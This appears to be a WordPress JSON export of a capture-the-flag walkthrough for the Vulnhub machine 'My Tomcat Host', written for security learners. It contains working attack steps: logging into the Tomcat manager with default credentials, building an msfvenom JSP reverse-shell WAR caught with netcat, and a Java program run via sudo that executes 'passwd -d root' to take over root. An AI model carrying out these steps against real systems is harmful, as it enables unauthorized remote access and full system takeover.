{"id":25994,"date":"2020-04-09T13:43:21","date_gmt":"2020-04-09T08:13:21","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=25994"},"modified":"2020-04-09T18:34:07","modified_gmt":"2020-04-09T13:04:07","slug":"my-tomcat-host-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/","title":{"rendered":"My Tomcat Host Vulnhub Walkthrough"},"content":{"rendered":"

Hello everyone. This time I am sharing the walkthrough of a CTF machine designed by Akanksha Verma<\/a>. This is a quick walkthrough of a vulnhub machine, My tomcat host. You can find this box on Infosec Warrior<\/a>. According to there author it is a medium or intermediate level machine with good privilege escalation. So here we go.<\/p>\n

\"My<\/strong><\/h3>\n

Methodology applied :<\/strong><\/h3>\n
Network Scanning<\/h5>\n
    \n
  • netdiscover<\/li>\n
  • Nmap<\/li>\n<\/ul>\n
    Enumeration<\/h5>\n
      \n
    • Nmap<\/li>\n
    • nikto<\/li>\n
    • msfvenom<\/li>\n<\/ul>\n
      Privilege escalation<\/h5>\n
        \n
      • JAVA<\/li>\n
      • sudo -l<\/li>\n<\/ul>\n

        Network Scanning<\/h3>\n

        For scanning the network and obtaining the IP address of the box I used\u00a0netdiscover.\u00a0<\/strong> As shown below<\/p>\n

        #netdiscover -i vboxnet0\r\n\tCurrently scanning: 192.168.18.0\/16   |   Screen View: Unique Hosts                                                                                      \r\n\t2 Captured ARP Req\/Rep packets, from 2 hosts.   Total size: 102               \r\n\t_____________________________________________________________________________\r\n\t  IP            At MAC Address     Count     Len  MAC Vendor \/ Hostname      \r\n\t-----------------------------------------------------------------------------\r\n\t192.168.2.2     08:00:27:a8:2f:81      1      42  PCS Systemtechnik GmbH      \r\n\t192.168.2.15    08:00:27:f7:24:84      1      60  PCS Systemtechnik GmbH<\/pre>\n
        So the IP of the box is\u00a0192.168.2.15.\u00a0<\/strong> let’s start with Nmap scanning<\/strong><\/p>\n
         <\/p>\n
        #nmap -p- -A -O  192.168.2.15\r\n\tStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-04-09 09:52 IST\r\n\tNmap scan report for 192.168.2.15\r\n\tHost is up (0.00044s latency).\r\n\tNot shown: 65533 filtered ports\r\n\tPORT     STATE SERVICE VERSION\r\n\t22\/tcp   open  ssh     OpenSSH 6.6.1 (protocol 2.0)\r\n\t| ssh-hostkey: \r\n\t|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)\r\n\t|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)\r\n\t|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)\r\n\t8080\/tcp open  http    Apache Tomcat 9.0.31\r\n\t|_http-favicon: Apache Tomcat\r\n\t|_http-title: Apache Tomcat\/9.0.31\r\n\tMAC Address: 08:00:27:F7:24:84 (Oracle VirtualBox virtual NIC)\r\n\tDevice type: general purpose\r\n\tRunning: Linux 3.X|4.X\r\n\tOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\r\n\tOS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9\r\n\tNetwork Distance: 1 hop\r\n\tTRACEROUTE\r\n\tHOP RTT     ADDRESS\r\n\t1   0.44 ms 192.168.2.15\r\n<\/pre>\n
        Enumeration :<\/h3>\n
        We can see that there is an open port number 8080.\u00a0<\/strong>So let us have a look there<\/p>\n
        \"\"<\/p>\n
         <\/p>\n
        Good there a\u00a0Tomcat Host\u00a0<\/strong>on the box. For more information, I fired\u00a0nikto<\/strong>.<\/p>\n
        #nikto -h http:\/\/192.168.2.15:8080\r\n\t\r\n\t- Nikto v2.1.6\r\n\t---------------------------------------------------------------------------\r\n\t+ Target IP:          192.168.2.15\r\n\t+ Target Hostname:    192.168.2.15\r\n\t+ Target Port:        8080\r\n\t+ Start Time:         2020-04-09 09:54:21 (GMT5.5)\r\n\t---------------------------------------------------------------------------\r\n\t+ Server: No banner retrieved\r\n\t+ The anti-clickjacking X-Frame-Options header is not present.\r\n\t+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\r\n\t+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type\r\n\t+ No CGI Directories found (use '-C all' to force check all possible dirs)\r\n\t+ OSVDB-39272: \/favicon.ico file identifies this app\/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community\r\n\t+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS \r\n\t+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.\r\n\t+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.\r\n\t+ \/examples\/servlets\/index.html: Apache Tomcat default JSP pages present.\r\n\t+ OSVDB-3720: \/examples\/jsp\/snp\/snoop.jsp: Displays information about page retrievals, including other users.\r\n\t+ \/axis2\/axis2-web\/HappyAxis.jsp: Apache Axis2 Happiness Page identified which includes internal application details.\r\n\t+ Default account found for 'Tomcat Manager Application' at \/manager\/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.\r\n\t+ \/host-manager\/html: Default Tomcat Manager \/ Host Manager interface found\r\n\t+ \/manager\/html: Tomcat Manager \/ Host Manager interface found (pass protected)\r\n\t+ \/axis2\/services\/Version\/getVersion: Apache Axis2 version identified.\r\n\t+ \/axis2\/services\/listServices: Apache Axis2 WebServices identified.\r\n\t+ \/axis2\/axis2-web\/index.jsp: Apache Axis2 Web Application identified.\r\n\t+ \/host-manager\/status: Default Tomcat Server Status interface found\r\n\t+ \/manager\/status: Tomcat Server Status interface found (pass protected)\r\n\t+ 8041 requests: 0 error(s) and 18 item(s) reported on remote host\r\n\t+ End Time:           2020-04-09 09:55:13 (GMT5.5) (52 seconds)\r\n\t---------------------------------------------------------------------------\r\n\t+ 1 host(s) tested<\/pre>\n
        Out of all the things, the most important to us is that we have credentials for tomcat manager application,\u00a0tomcat: tomcat.\u00a0<\/strong>and the directory\u00a0\/manager\/html\u00a0<\/strong> page .<\/p>\n
        \"\"<\/p>\n
        We were in the host and found there is a\u00a0.war file upload <\/strong>option. So without wasting time I use msfvenom to generate a shell.war file<\/p>\n
        #msfvenom -p java\/jsp_shell_reverse_tcp LHOST=192.168.2.1 LPORT=1505 -f war > armour.war\r\n\t\r\n\tPayload size: 1106 bytes\r\n\tThe final size of war file: 1106 bytes<\/pre>\n
        Where LHOST = listener host IP\u00a0 && LPORT = listener port<\/p>\n
        \"\"<\/p>\n
        And we have our payload ready, and we are all set to launch the attack. Upload this shell.war file and call it on the browser while having the listener on, on our machine<\/p>\n
        #nc -nlvp 1505\r\n\t\r\n\tlistening on [any] 1505 ...\r\n \tconnect to [192.168.2.1] from (UNKNOWN) [192.168.2.15] 57094\r\n\tid\r\n\tuid=998(tomcat) gid=997(tomcat) groups=997(tomcat)\r\n\thostname\r\n\tmy_tomcat\r\n\twhoami\r\n\ttomcat<\/pre>\n
        Got the shell of the user tomcat<\/p>\n
        Privilege Escalation:<\/h3>\n
        Firstly I converted the shell into the interactive shell and I checked them for permissions on sudo command :<\/p>\n
        sh-4.2$ id\r\n\tuid=998(tomcat) gid=997(tomcat) groups=997(tomcat)\r\n\tsh-4.2$ sudo -l\r\n\tMatching Defaults entries for tomcat on this host:\r\n\t    requiretty, !visiblepw, always_set_home, env_reset, env_keep=\"COLORS\r\n\t    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS\", env_keep+=\"MAIL PS1\r\n\t    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\", env_keep+=\"LC_COLLATE\r\n\t    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\", env_keep+=\"LC_MONETARY\r\n\t    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\", env_keep+=\"LC_TIME LC_ALL\r\n\t    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\",\r\n\t    secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\r\n\r\n\tUser tomcat may run the following commands on this host:\r\n\t    (ALL) NOPASSWD:\r\n\t    \/usr\/lib\/jvm\/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64\/jre\/bin\/java<\/pre>\n
        I see that we can run java<\/strong> command with sudo<\/strong> privileges. You can find the program from any place, I got it on stack overflow.<\/p>\n
        import java.io.BufferedReader;\r\n\timport java.io.InputStreamReader;\r\n\r\n\tpublic class armour {  \/\/you have to change thew class same as file name\r\n\t    public static void main(String args[]) {\r\n\t        String s;\r\n\t        Process p;\r\n\t        try {\r\n\t            p = Runtime.getRuntime().exec(\"passwd -d root\");  \/\/the command you want to execute\r\n\t            BufferedReader br = new BufferedReader(\r\n\t                new InputStreamReader(p.getInputStream()));\r\n\t            while ((s = br.readLine()) != null)\r\n\t                System.out.println(\"line: \" + s);\r\n\t            p.waitFor();\r\n\t            System.out.println (\"exit: \" + p.exitValue());\r\n\t            p.destroy();\r\n\t        } catch (Exception e) {}\r\n\t    }\r\n\t}<\/pre>\n
        now I compile the code and executed it.<\/p>\n
        bash-4.2$ javac armour.java\r\n\tbash-4.2$ sudo java armour\r\n\tline: Removing password for user root.\r\n\tline: passwd: Success\r\n\texit: 0\r\n\tbash-4.2$ su root\r\n\t[root@my_tomcat tmp]# id \r\n\tuid=0(root) gid=0(root) groups=0(root)\r\n\t[root@my_tomcat tmp]# hostname \r\n\tmy_tomcat\r\n\t[root@my_tomcat tmp]# whoami \r\n\troot\r\n\t[root@my_tomcat tmp]# uname -a\r\n\tLinux my_tomcat 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU\/Linux\r\n\t[root@my_tomcat tmp]# cd \/root\/\r\n\t[root@my_tomcat ~]# ls\r\n\tproof.txt\r\n\t[root@my_tomcat ~]# cat proof.txt \r\n\tBest of Luck\r\n\t628435356e49f976bab2c04948d22fe4\r\n\t[root@my_tomcat ~]#<\/pre>\n
        Boom !!! Eureka !!! I Got root …… and here is the flag.<\/p>\n
         <\/p>\n","protected":false},"excerpt":{"rendered":"
        Hello everyone. This time I am sharing the walkthrough of a CTF machine designed by Akanksha Verma. This is a…<\/p>\n","protected":false},"author":1,"featured_media":25996,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107],"tags":[121,118,122],"yoast_head":"\nMy Tomcat Host Vulnhub Walkthrough - Armour Infosec<\/title>\n<meta name=\"description\" content=\"Here\u2019s a new My Tomcat Host Walkthrough for Vulnhub machines. This machine is created by Akanksha Sachin Verma. This VM is good for beginners.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"My Tomcat Host Vulnhub Walkthrough - Armour Infosec\" \/>\n<meta property=\"og:description\" content=\"Here\u2019s a new My Tomcat Host Walkthrough for Vulnhub machines. This machine is created by Akanksha Sachin Verma. This VM is good for beginners.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/\" \/>\n<meta property=\"og:site_name\" content=\"Armour Infosec\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ArmourInfosec\" \/>\n<meta property=\"article:published_time\" content=\"2020-04-09T08:13:21+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-04-09T13:04:07+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-09-09-53-20.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1065\" \/>\n\t<meta property=\"og:image:height\" content=\"464\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Armour Infosec\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:site\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Armour Infosec\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/\",\"url\":\"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/\",\"name\":\"My Tomcat Host Vulnhub Walkthrough - Armour Infosec\",\"isPartOf\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#website\"},\"datePublished\":\"2020-04-09T08:13:21+00:00\",\"dateModified\":\"2020-04-09T13:04:07+00:00\",\"author\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\"},\"description\":\"Here\u2019s a new My Tomcat Host Walkthrough for Vulnhub machines. This machine is created by Akanksha Sachin Verma. This VM is good for beginners.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.armourinfosec.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"My Tomcat Host Vulnhub Walkthrough\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.armourinfosec.com\/#website\",\"url\":\"https:\/\/www.armourinfosec.com\/\",\"name\":\"Armour Infosec\",\"description\":\"Do Your Part - Be Security Smart\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.armourinfosec.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\",\"name\":\"Armour Infosec\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"caption\":\"Armour Infosec\"},\"sameAs\":[\"https:\/\/www.armourinfosec.com\/\"],\"url\":\"https:\/\/www.armourinfosec.com\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"My Tomcat Host Vulnhub Walkthrough - Armour Infosec","description":"Here\u2019s a new My Tomcat Host Walkthrough for Vulnhub machines. This machine is created by Akanksha Sachin Verma. This VM is good for beginners.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/","og_locale":"en_US","og_type":"article","og_title":"My Tomcat Host Vulnhub Walkthrough - Armour Infosec","og_description":"Here\u2019s a new My Tomcat Host Walkthrough for Vulnhub machines. This machine is created by Akanksha Sachin Verma. This VM is good for beginners.","og_url":"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/","og_site_name":"Armour Infosec","article_publisher":"https:\/\/www.facebook.com\/ArmourInfosec","article_published_time":"2020-04-09T08:13:21+00:00","article_modified_time":"2020-04-09T13:04:07+00:00","og_image":[{"width":1065,"height":464,"url":"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-09-09-53-20.png","type":"image\/png"}],"author":"Armour Infosec","twitter_card":"summary_large_image","twitter_creator":"@ArmourInfosec","twitter_site":"@ArmourInfosec","twitter_misc":{"Written by":"Armour Infosec","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/","url":"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/","name":"My Tomcat Host Vulnhub Walkthrough - Armour Infosec","isPartOf":{"@id":"https:\/\/www.armourinfosec.com\/#website"},"datePublished":"2020-04-09T08:13:21+00:00","dateModified":"2020-04-09T13:04:07+00:00","author":{"@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308"},"description":"Here\u2019s a new My Tomcat Host Walkthrough for Vulnhub machines. This machine is created by Akanksha Sachin Verma. This VM is good for beginners.","breadcrumb":{"@id":"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.armourinfosec.com\/my-tomcat-host-walkthrough\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.armourinfosec.com\/"},{"@type":"ListItem","position":2,"name":"My Tomcat Host Vulnhub Walkthrough"}]},{"@type":"WebSite","@id":"https:\/\/www.armourinfosec.com\/#website","url":"https:\/\/www.armourinfosec.com\/","name":"Armour Infosec","description":"Do Your Part - Be Security Smart","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.armourinfosec.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308","name":"Armour Infosec","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","caption":"Armour Infosec"},"sameAs":["https:\/\/www.armourinfosec.com\/"],"url":"https:\/\/www.armourinfosec.com\/author\/admin\/"}]}},"menu_order":0,"_links":{"self":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/25994"}],"collection":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/comments?post=25994"}],"version-history":[{"count":0,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/25994\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media\/25996"}],"wp:attachment":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media?parent=25994"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/categories?post=25994"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/tags?post=25994"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}